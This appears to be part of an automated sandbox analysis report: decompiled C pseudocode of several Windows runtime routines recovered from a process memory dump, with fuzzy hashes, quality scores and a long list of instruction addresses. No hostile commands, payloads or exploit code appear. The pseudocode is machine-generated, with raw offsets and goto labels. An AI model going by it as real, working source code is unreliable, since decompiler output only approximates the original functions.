                                        • Opcode Fuzzy Hash: e1c25622e4f6f9b6d3a16ccac65e457abd12820172d8796a11a06ebd618df233
                                        • Instruction Fuzzy Hash: 1951D1B66083459BCB14DF64C444A7BB3EDBF88614F05092EFA86D7240FB74DA14CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E0539B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                        				signed int _t65;
                                        				signed short _t69;
                                        				intOrPtr _t70;
                                        				signed short _t85;
                                        				void* _t86;
                                        				signed short _t89;
                                        				signed short _t91;
                                        				intOrPtr _t92;
                                        				intOrPtr _t97;
                                        				intOrPtr* _t98;
                                        				signed short _t99;
                                        				signed short _t101;
                                        				void* _t102;
                                        				char* _t103;
                                        				signed short _t104;
                                        				intOrPtr* _t110;
                                        				void* _t111;
                                        				void* _t114;
                                        				intOrPtr* _t115;
                                        
                                        				_t109 = __esi;
                                        				_t108 = __edi;
                                        				_t106 = __edx;
                                        				_t95 = __ebx;
                                        				_push(0x90);
                                        				_push(0x546f7a8);
                                        				E053ED0E8(__ebx, __edi, __esi);
                                        				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                        				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                        				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                        				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                        				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                        				if(__edx == 0xffffffff) {
                                        					L6:
                                        					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                        					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                        					__eflags = _t65 & 0x00000002;
                                        					if((_t65 & 0x00000002) != 0) {
                                        						L3:
                                        						L4:
                                        						return E053ED130(_t95, _t108, _t109);
                                        					}
                                        					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                        					_t108 = 0;
                                        					_t109 = 0;
                                        					_t95 = 0;
                                        					__eflags = 0;
                                        					while(1) {
                                        						__eflags = _t95 - 0x200;
                                        						if(_t95 >= 0x200) {
                                        							break;
                                        						}
                                        						E053DD000(0x80);
                                        						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                        						_t108 = _t115;
                                        						_t95 = _t95 - 0xffffff80;
                                        						_t17 = _t114 - 4;
                                        						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                        						__eflags =  *_t17;
                                        						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                        						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                        						_t102 = _t110 + 1;
                                        						do {
                                        							_t85 =  *_t110;
                                        							_t110 = _t110 + 1;
                                        							__eflags = _t85;
                                        						} while (_t85 != 0);
                                        						_t111 = _t110 - _t102;
                                        						_t21 = _t95 - 1; // -129
                                        						_t86 = _t21;
                                        						__eflags = _t111 - _t86;
                                        						if(_t111 > _t86) {
                                        							_t111 = _t86;
                                        						}
                                        						E053DF3E0(_t108, _t106, _t111);
                                        						_t115 = _t115 + 0xc;
                                        						_t103 = _t111 + _t108;
                                        						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                        						_t89 = _t95 - _t111;
                                        						__eflags = _t89;
                                        						_push(0);
                                        						if(_t89 == 0) {
                                        							L15:
                                        							_t109 = 0xc000000d;
                                        							goto L16;
                                        						} else {
                                        							__eflags = _t89 - 0x7fffffff;
                                        							if(_t89 <= 0x7fffffff) {
                                        								L16:
                                        								 *(_t114 - 0x94) = _t109;
                                        								__eflags = _t109;
                                        								if(_t109 < 0) {
                                        									__eflags = _t89;
                                        									if(_t89 != 0) {
                                        										 *_t103 = 0;
                                        									}
                                        									L26:
                                        									 *(_t114 - 0xa0) = _t109;
                                        									 *(_t114 - 4) = 0xfffffffe;
                                        									__eflags = _t109;
                                        									if(_t109 >= 0) {
                                        										L31:
                                        										_t98 = _t108;
                                        										_t39 = _t98 + 1; // 0x1
                                        										_t106 = _t39;
                                        										do {
                                        											_t69 =  *_t98;
                                        											_t98 = _t98 + 1;
                                        											__eflags = _t69;
                                        										} while (_t69 != 0);
                                        										_t99 = _t98 - _t106;
                                        										__eflags = _t99;
                                        										L34:
                                        										_t70 =  *[fs:0x30];
                                        										__eflags =  *((char*)(_t70 + 2));
                                        										if( *((char*)(_t70 + 2)) != 0) {
                                        											L40:
                                        											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                        											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                        											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                        											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                        											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                        											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                        											 *(_t114 - 4) = 1;
                                        											_push(_t114 - 0x74);
                                        											L053EDEF0(_t99, _t106);
                                        											 *(_t114 - 4) = 0xfffffffe;
                                        											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                        											goto L3;
                                        										}
                                        										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                        										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                        											goto L40;
                                        										}
                                        										_push( *((intOrPtr*)(_t114 + 8)));
                                        										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                        										_push(_t99 & 0x0000ffff);
                                        										_push(_t108);
                                        										_push(1);
                                        										_t101 = E053DB280();
                                        										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                        										if( *((char*)(_t114 + 0x14)) == 1) {
                                        											__eflags = _t101 - 0x80000003;
                                        											if(_t101 == 0x80000003) {
                                        												E053DB7E0(1);
                                        												_t101 = 0;
                                        												__eflags = 0;
                                        											}
                                        										}
                                        										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                        										goto L4;
                                        									}
                                        									__eflags = _t109 - 0x80000005;
                                        									if(_t109 == 0x80000005) {
                                        										continue;
                                        									}
                                        									break;
                                        								}
                                        								 *(_t114 - 0x90) = 0;
                                        								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                        								_t91 = E053DE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                        								_t115 = _t115 + 0x10;
                                        								_t104 = _t91;
                                        								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                        								__eflags = _t104;
                                        								if(_t104 < 0) {
                                        									L21:
                                        									_t109 = 0x80000005;
                                        									 *(_t114 - 0x90) = 0x80000005;
                                        									L22:
                                        									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                        									L23:
                                        									 *(_t114 - 0x94) = _t109;
                                        									goto L26;
                                        								}
                                        								__eflags = _t104 - _t92;
                                        								if(__eflags > 0) {
                                        									goto L21;
                                        								}
                                        								if(__eflags == 0) {
                                        									goto L22;
                                        								}
                                        								goto L23;
                                        							}
                                        							goto L15;
                                        						}
                                        					}
                                        					__eflags = _t109;
                                        					if(_t109 >= 0) {
                                        						goto L31;
                                        					}
                                        					__eflags = _t109 - 0x80000005;
                                        					if(_t109 != 0x80000005) {
                                        						goto L31;
                                        					}
                                        					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                        					_t38 = _t95 - 1; // -129
                                        					_t99 = _t38;
                                        					goto L34;
                                        				}
                                        				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                        					__eflags = __edx - 0x65;
                                        					if(__edx != 0x65) {
                                        						goto L2;
                                        					}
                                        					goto L6;
                                        				}
                                        				L2:
                                        				_push( *((intOrPtr*)(_t114 + 8)));
                                        				_push(_t106);
                                        				if(E053DA890() != 0) {
                                        					goto L6;
                                        				}
                                        				goto L3;
                                        			}























                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: _vswprintf_s
                                        • String ID:
                                        • API String ID: 677850445-0
                                        • Opcode ID: e7ee7c20365ef5e4f8ca44ebe0e399c3ca9e1711b57032fc4b52ef5a6022f435
                                        • Instruction ID: 19522ffd585a96935341ee7b82fd536102dd835383a4e6b74d865d9232b5b855
                                        • Opcode Fuzzy Hash: e7ee7c20365ef5e4f8ca44ebe0e399c3ca9e1711b57032fc4b52ef5a6022f435
                                        • Instruction Fuzzy Hash: F151EE72E042698BDF36CF68D844BBFBBF1BF00710F1041ADDA59AB281D7B549818B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 76%
                                        			E053BB944(signed int* __ecx, char __edx) {
                                        				signed int _v8;
                                        				signed int _v16;
                                        				signed int _v20;
                                        				char _v28;
                                        				signed int _v32;
                                        				char _v36;
                                        				signed int _v40;
                                        				intOrPtr _v44;
                                        				signed int* _v48;
                                        				signed int _v52;
                                        				signed int _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				intOrPtr _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				char _v77;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr* _t65;
                                        				intOrPtr _t67;
                                        				intOrPtr _t68;
                                        				char* _t73;
                                        				intOrPtr _t77;
                                        				intOrPtr _t78;
                                        				signed int _t82;
                                        				intOrPtr _t83;
                                        				void* _t87;
                                        				char _t88;
                                        				intOrPtr* _t89;
                                        				intOrPtr _t91;
                                        				void* _t97;
                                        				intOrPtr _t100;
                                        				void* _t102;
                                        				void* _t107;
                                        				signed int _t108;
                                        				intOrPtr* _t112;
                                        				void* _t113;
                                        				intOrPtr* _t114;
                                        				intOrPtr _t115;
                                        				intOrPtr _t116;
                                        				intOrPtr _t117;
                                        				signed int _t118;
                                        				void* _t130;
                                        
                                        				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                        				_v8 =  *0x548d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                        				_t112 = __ecx;
                                        				_v77 = __edx;
                                        				_v48 = __ecx;
                                        				_v28 = 0;
                                        				_t5 = _t112 + 0xc; // 0x575651ff
                                        				_t105 =  *_t5;
                                        				_v20 = 0;
                                        				_v16 = 0;
                                        				if(_t105 == 0) {
                                        					_t50 = _t112 + 4; // 0x5de58b5b
                                        					_t60 =  *__ecx |  *_t50;
                                        					if(( *__ecx |  *_t50) != 0) {
                                        						 *__ecx = 0;
                                        						__ecx[1] = 0;
                                        						if(E053B7D50() != 0) {
                                        							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        						} else {
                                        							_t65 = 0x7ffe0386;
                                        						}
                                        						if( *_t65 != 0) {
                                        							E05468CD6(_t112);
                                        						}
                                        						_push(0);
                                        						_t52 = _t112 + 0x10; // 0x778df98b
                                        						_push( *_t52);
                                        						_t60 = E053D9E20();
                                        					}
                                        					L20:
                                        					_pop(_t107);
                                        					_pop(_t113);
                                        					_pop(_t87);
                                        					return E053DB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                        				}
                                        				_t8 = _t112 + 8; // 0x8b000cc2
                                        				_t67 =  *_t8;
                                        				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                        				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                        				_t108 =  *(_t67 + 0x14);
                                        				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                        				_t105 = 0x2710;
                                        				asm("sbb eax, edi");
                                        				_v44 = _t88;
                                        				_v52 = _t108;
                                        				_t60 = E053DCE00(_t97, _t68, 0x2710, 0);
                                        				_v56 = _t60;
                                        				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                        					L3:
                                        					 *(_t112 + 0x44) = _t60;
                                        					_t105 = _t60 * 0x2710 >> 0x20;
                                        					 *_t112 = _t88;
                                        					 *(_t112 + 4) = _t108;
                                        					_v20 = _t60 * 0x2710;
                                        					_v16 = _t60 * 0x2710 >> 0x20;
                                        					if(_v77 != 0) {
                                        						L16:
                                        						_v36 = _t88;
                                        						_v32 = _t108;
                                        						if(E053B7D50() != 0) {
                                        							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        						} else {
                                        							_t73 = 0x7ffe0386;
                                        						}
                                        						if( *_t73 != 0) {
                                        							_t105 = _v40;
                                        							E05468F6A(_t112, _v40, _t88, _t108);
                                        						}
                                        						_push( &_v28);
                                        						_push(0);
                                        						_push( &_v36);
                                        						_t48 = _t112 + 0x10; // 0x778df98b
                                        						_push( *_t48);
                                        						_t60 = E053DAF60();
                                        						goto L20;
                                        					} else {
                                        						_t89 = 0x7ffe03b0;
                                        						do {
                                        							_t114 = 0x7ffe0010;
                                        							do {
                                        								_t77 =  *0x5488628; // 0x0
                                        								_v68 = _t77;
                                        								_t78 =  *0x548862c; // 0x0
                                        								_v64 = _t78;
                                        								_v72 =  *_t89;
                                        								_v76 =  *((intOrPtr*)(_t89 + 4));
                                        								while(1) {
                                        									_t105 =  *0x7ffe000c;
                                        									_t100 =  *0x7ffe0008;
                                        									if(_t105 ==  *_t114) {
                                        										goto L8;
                                        									}
                                        									asm("pause");
                                        								}
                                        								L8:
                                        								_t89 = 0x7ffe03b0;
                                        								_t115 =  *0x7ffe03b0;
                                        								_t82 =  *0x7FFE03B4;
                                        								_v60 = _t115;
                                        								_t114 = 0x7ffe0010;
                                        								_v56 = _t82;
                                        							} while (_v72 != _t115 || _v76 != _t82);
                                        							_t83 =  *0x5488628; // 0x0
                                        							_t116 =  *0x548862c; // 0x0
                                        							_v76 = _t116;
                                        							_t117 = _v68;
                                        						} while (_t117 != _t83 || _v64 != _v76);
                                        						asm("sbb edx, [esp+0x24]");
                                        						_t102 = _t100 - _v60 - _t117;
                                        						_t112 = _v48;
                                        						_t91 = _v44;
                                        						asm("sbb edx, eax");
                                        						_t130 = _t105 - _v52;
                                        						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                        							_t88 = _t102 - _t91;
                                        							asm("sbb edx, edi");
                                        							_t108 = _t105;
                                        						} else {
                                        							_t88 = 0;
                                        							_t108 = 0;
                                        						}
                                        						goto L16;
                                        					}
                                        				} else {
                                        					if( *(_t112 + 0x44) == _t60) {
                                        						goto L20;
                                        					}
                                        					goto L3;
                                        				}
                                        			}

















































                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 053BB9A5
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 885266447-0
                                        • Opcode ID: d943b0372b328c3493d467a837d22b9d21249880d03dcf0f7802d93ebf75fef5
                                        • Instruction ID: a74c49ffc390cffc812d13a68c9372484cc2c2bd0ad1d6382d4b61a0c0970ec2
                                        • Opcode Fuzzy Hash: d943b0372b328c3493d467a837d22b9d21249880d03dcf0f7802d93ebf75fef5
                                        • Instruction Fuzzy Hash: AD515D71A18300CFD724CF29C49096AFBFAFB88650F54496EF68597B44DBB0E844CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 80%
                                        			E053CFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                        				char _v5;
                                        				signed int _v8;
                                        				signed int _v12;
                                        				char _v16;
                                        				char _v17;
                                        				char _v20;
                                        				signed int _v24;
                                        				char _v28;
                                        				char _v32;
                                        				signed int _v40;
                                        				void* __ecx;
                                        				void* __edi;
                                        				void* __ebp;
                                        				signed int _t73;
                                        				intOrPtr* _t75;
                                        				signed int _t77;
                                        				signed int _t79;
                                        				signed int _t81;
                                        				intOrPtr _t83;
                                        				intOrPtr _t85;
                                        				intOrPtr _t86;
                                        				signed int _t91;
                                        				signed int _t94;
                                        				signed int _t95;
                                        				signed int _t96;
                                        				signed int _t106;
                                        				signed int _t108;
                                        				signed int _t114;
                                        				signed int _t116;
                                        				signed int _t118;
                                        				signed int _t122;
                                        				signed int _t123;
                                        				void* _t129;
                                        				signed int _t130;
                                        				void* _t132;
                                        				intOrPtr* _t134;
                                        				signed int _t138;
                                        				signed int _t141;
                                        				signed int _t147;
                                        				intOrPtr _t153;
                                        				signed int _t154;
                                        				signed int _t155;
                                        				signed int _t170;
                                        				void* _t174;
                                        				signed int _t176;
                                        				signed int _t177;
                                        
                                        				_t129 = __ebx;
                                        				_push(_t132);
                                        				_push(__esi);
                                        				_t174 = _t132;
                                        				_t73 =  !( *( *(_t174 + 0x18)));
                                        				if(_t73 >= 0) {
                                        					L5:
                                        					return _t73;
                                        				} else {
                                        					E053AEEF0(0x5487b60);
                                        					_t134 =  *0x5487b84; // 0x77f07b80
                                        					_t2 = _t174 + 0x24; // 0x24
                                        					_t75 = _t2;
                                        					if( *_t134 != 0x5487b80) {
                                        						_push(3);
                                        						asm("int 0x29");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						_push(0x5487b60);
                                        						_t170 = _v8;
                                        						_v28 = 0;
                                        						_v40 = 0;
                                        						_v24 = 0;
                                        						_v17 = 0;
                                        						_v32 = 0;
                                        						__eflags = _t170 & 0xffff7cf2;
                                        						if((_t170 & 0xffff7cf2) != 0) {
                                        							L43:
                                        							_t77 = 0xc000000d;
                                        						} else {
                                        							_t79 = _t170 & 0x0000000c;
                                        							__eflags = _t79;
                                        							if(_t79 != 0) {
                                        								__eflags = _t79 - 0xc;
                                        								if(_t79 == 0xc) {
                                        									goto L43;
                                        								} else {
                                        									goto L9;
                                        								}
                                        							} else {
                                        								_t170 = _t170 | 0x00000008;
                                        								__eflags = _t170;
                                        								L9:
                                        								_t81 = _t170 & 0x00000300;
                                        								__eflags = _t81 - 0x300;
                                        								if(_t81 == 0x300) {
                                        									goto L43;
                                        								} else {
                                        									_t138 = _t170 & 0x00000001;
                                        									__eflags = _t138;
                                        									_v24 = _t138;
                                        									if(_t138 != 0) {
                                        										__eflags = _t81;
                                        										if(_t81 != 0) {
                                        											goto L43;
                                        										} else {
                                        											goto L11;
                                        										}
                                        									} else {
                                        										L11:
                                        										_push(_t129);
                                        										_t77 = E053A6D90( &_v20);
                                        										_t130 = _t77;
                                        										__eflags = _t130;
                                        										if(_t130 >= 0) {
                                        											_push(_t174);
                                        											__eflags = _t170 & 0x00000301;
                                        											if((_t170 & 0x00000301) == 0) {
                                        												_t176 = _a8;
                                        												__eflags = _t176;
                                        												if(__eflags == 0) {
                                        													L64:
                                        													_t83 =  *[fs:0x18];
                                        													_t177 = 0;
                                        													__eflags =  *(_t83 + 0xfb8);
                                        													if( *(_t83 + 0xfb8) != 0) {
                                        														E053A76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                        														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                        													}
                                        													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                        													goto L15;
                                        												} else {
                                        													asm("sbb edx, edx");
                                        													_t114 = E05438938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                        													__eflags = _t114;
                                        													if(_t114 < 0) {
                                        														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                        														E0539B150();
                                        													}
                                        													_t116 = E05436D81(_t176,  &_v16);
                                        													__eflags = _t116;
                                        													if(_t116 >= 0) {
                                        														__eflags = _v16 - 2;
                                        														if(_v16 < 2) {
                                        															L56:
                                        															_t118 = E053A75CE(_v20, 5, 0);
                                        															__eflags = _t118;
                                        															if(_t118 < 0) {
                                        																L67:
                                        																_t130 = 0xc0000017;
                                        																goto L32;
                                        															} else {
                                        																__eflags = _v12;
                                        																if(_v12 == 0) {
                                        																	goto L67;
                                        																} else {
                                        																	_t153 =  *0x5488638; // 0x3301c58
                                        																	_t122 = L053A38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                        																	_t154 = _v12;
                                        																	_t130 = _t122;
                                        																	__eflags = _t130;
                                        																	if(_t130 >= 0) {
                                        																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                        																		__eflags = _t123;
                                        																		if(_t123 != 0) {
                                        																			_t155 = _a12;
                                        																			__eflags = _t155;
                                        																			if(_t155 != 0) {
                                        																				 *_t155 = _t123;
                                        																			}
                                        																			goto L64;
                                        																		} else {
                                        																			E053A76E2(_t154);
                                        																			goto L41;
                                        																		}
                                        																	} else {
                                        																		E053A76E2(_t154);
                                        																		_t177 = 0;
                                        																		goto L18;
                                        																	}
                                        																}
                                        															}
                                        														} else {
                                        															__eflags =  *_t176;
                                        															if( *_t176 != 0) {
                                        																goto L56;
                                        															} else {
                                        																__eflags =  *(_t176 + 2);
                                        																if( *(_t176 + 2) == 0) {
                                        																	goto L64;
                                        																} else {
                                        																	goto L56;
                                        																}
                                        															}
                                        														}
                                        													} else {
                                        														_t130 = 0xc000000d;
                                        														goto L32;
                                        													}
                                        												}
                                        												goto L35;
                                        											} else {
                                        												__eflags = _a8;
                                        												if(_a8 != 0) {
                                        													_t77 = 0xc000000d;
                                        												} else {
                                        													_v5 = 1;
                                        													L053CFCE3(_v20, _t170);
                                        													_t177 = 0;
                                        													__eflags = 0;
                                        													L15:
                                        													_t85 =  *[fs:0x18];
                                        													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                        													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                        														L18:
                                        														__eflags = _t130;
                                        														if(_t130 != 0) {
                                        															goto L32;
                                        														} else {
                                        															__eflags = _v5 - _t130;
                                        															if(_v5 == _t130) {
                                        																goto L32;
                                        															} else {
                                        																_t86 =  *[fs:0x18];
                                        																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                        																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                        																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                        																}
                                        																__eflags = _t177;
                                        																if(_t177 == 0) {
                                        																	L31:
                                        																	__eflags = 0;
                                        																	L053A70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                        																	goto L32;
                                        																} else {
                                        																	__eflags = _v24;
                                        																	_t91 =  *(_t177 + 0x20);
                                        																	if(_v24 != 0) {
                                        																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                        																		goto L31;
                                        																	} else {
                                        																		_t141 = _t91 & 0x00000040;
                                        																		__eflags = _t170 & 0x00000100;
                                        																		if((_t170 & 0x00000100) == 0) {
                                        																			__eflags = _t141;
                                        																			if(_t141 == 0) {
                                        																				L74:
                                        																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                        																				goto L27;
                                        																			} else {
                                        																				_t177 = E053CFD22(_t177);
                                        																				__eflags = _t177;
                                        																				if(_t177 == 0) {
                                        																					goto L42;
                                        																				} else {
                                        																					_t130 = E053CFD9B(_t177, 0, 4);
                                        																					__eflags = _t130;
                                        																					if(_t130 != 0) {
                                        																						goto L42;
                                        																					} else {
                                        																						_t68 = _t177 + 0x20;
                                        																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                        																						__eflags =  *_t68;
                                        																						_t91 =  *(_t177 + 0x20);
                                        																						goto L74;
                                        																					}
                                        																				}
                                        																			}
                                        																			goto L35;
                                        																		} else {
                                        																			__eflags = _t141;
                                        																			if(_t141 != 0) {
                                        																				_t177 = E053CFD22(_t177);
                                        																				__eflags = _t177;
                                        																				if(_t177 == 0) {
                                        																					L42:
                                        																					_t77 = 0xc0000001;
                                        																					goto L33;
                                        																				} else {
                                        																					_t130 = E053CFD9B(_t177, 0, 4);
                                        																					__eflags = _t130;
                                        																					if(_t130 != 0) {
                                        																						goto L42;
                                        																					} else {
                                        																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                        																						_t91 =  *(_t177 + 0x20);
                                        																						goto L26;
                                        																					}
                                        																				}
                                        																				goto L35;
                                        																			} else {
                                        																				L26:
                                        																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                        																				__eflags = _t94;
                                        																				L27:
                                        																				 *(_t177 + 0x20) = _t94;
                                        																				__eflags = _t170 & 0x00008000;
                                        																				if((_t170 & 0x00008000) != 0) {
                                        																					_t95 = _a12;
                                        																					__eflags = _t95;
                                        																					if(_t95 != 0) {
                                        																						_t96 =  *_t95;
                                        																						__eflags = _t96;
                                        																						if(_t96 != 0) {
                                        																							 *((short*)(_t177 + 0x22)) = 0;
                                        																							_t40 = _t177 + 0x20;
                                        																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                        																							__eflags =  *_t40;
                                        																						}
                                        																					}
                                        																				}
                                        																				goto L31;
                                        																			}
                                        																		}
                                        																	}
                                        																}
                                        															}
                                        														}
                                        													} else {
                                        														_t147 =  *( *[fs:0x18] + 0xfc0);
                                        														_t106 =  *(_t147 + 0x20);
                                        														__eflags = _t106 & 0x00000040;
                                        														if((_t106 & 0x00000040) != 0) {
                                        															_t147 = E053CFD22(_t147);
                                        															__eflags = _t147;
                                        															if(_t147 == 0) {
                                        																L41:
                                        																_t130 = 0xc0000001;
                                        																L32:
                                        																_t77 = _t130;
                                        																goto L33;
                                        															} else {
                                        																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                        																_t106 =  *(_t147 + 0x20);
                                        																goto L17;
                                        															}
                                        															goto L35;
                                        														} else {
                                        															L17:
                                        															_t108 = _t106 | 0x00000080;
                                        															__eflags = _t108;
                                        															 *(_t147 + 0x20) = _t108;
                                        															 *( *[fs:0x18] + 0xfc0) = _t147;
                                        															goto L18;
                                        														}
                                        													}
                                        												}
                                        											}
                                        											L33:
                                        										}
                                        									}
                                        								}
                                        							}
                                        						}
                                        						L35:
                                        						return _t77;
                                        					} else {
                                        						 *_t75 = 0x5487b80;
                                        						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                        						 *_t134 = _t75;
                                        						 *0x5487b84 = _t75;
                                        						_t73 = E053AEB70(_t134, 0x5487b60);
                                        						if( *0x5487b20 != 0) {
                                        							_t73 =  *( *[fs:0x30] + 0xc);
                                        							if( *((char*)(_t73 + 0x28)) == 0) {
                                        								_t73 = E053AFF60( *0x5487b20);
                                        							}
                                        						}
                                        						goto L5;
                                        					}
                                        				}
                                        			}
                                        0x0540be8b
                                        0x0540be99
                                        0x0540be9d
                                        0x0540bea0
                                        0x0540beac
                                        0x0540beaf
                                        0x0540beb1
                                        0x0540beb3
                                        0x0540beb3
                                        0x00000000
                                        0x0540bea2
                                        0x0540bea2
                                        0x00000000
                                        0x0540bea2
                                        0x0540be8d
                                        0x0540be8d
                                        0x0540be92
                                        0x00000000
                                        0x0540be92
                                        0x0540be8b
                                        0x0540be60
                                        0x0540be3b
                                        0x0540be3b
                                        0x0540be3e
                                        0x00000000
                                        0x0540be40
                                        0x0540be40
                                        0x0540be44
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0540be44
                                        0x0540be3e
                                        0x0540be29
                                        0x0540be29
                                        0x00000000
                                        0x0540be29
                                        0x0540be27
                                        0x00000000
                                        0x053cfba7
                                        0x053cfba7
                                        0x053cfbab
                                        0x0540bf02
                                        0x053cfbb1
                                        0x053cfbb1
                                        0x053cfbb8
                                        0x053cfbbd
                                        0x053cfbbd
                                        0x053cfbbf
                                        0x053cfbbf
                                        0x053cfbc5
                                        0x053cfbcb
                                        0x053cfbf8
                                        0x053cfbf8
                                        0x053cfbfa
                                        0x00000000
                                        0x053cfc00
                                        0x053cfc00
                                        0x053cfc03
                                        0x00000000
                                        0x053cfc09
                                        0x053cfc09
                                        0x053cfc0f
                                        0x053cfc15
                                        0x053cfc23
                                        0x053cfc23
                                        0x053cfc25
                                        0x053cfc27
                                        0x053cfc75
                                        0x053cfc7c
                                        0x053cfc84
                                        0x00000000
                                        0x053cfc29
                                        0x053cfc29
                                        0x053cfc2d
                                        0x053cfc30
                                        0x0540bf0f
                                        0x00000000
                                        0x053cfc36
                                        0x053cfc38
                                        0x053cfc3b
                                        0x053cfc41
                                        0x0540bf17
                                        0x0540bf19
                                        0x0540bf48
                                        0x0540bf4b
                                        0x00000000
                                        0x0540bf1b
                                        0x0540bf22
                                        0x0540bf24
                                        0x0540bf26
                                        0x00000000
                                        0x0540bf2c
                                        0x0540bf37
                                        0x0540bf39
                                        0x0540bf3b
                                        0x00000000
                                        0x0540bf41
                                        0x0540bf41
                                        0x0540bf41
                                        0x0540bf41
                                        0x0540bf45
                                        0x00000000
                                        0x0540bf45
                                        0x0540bf3b
                                        0x0540bf26
                                        0x00000000
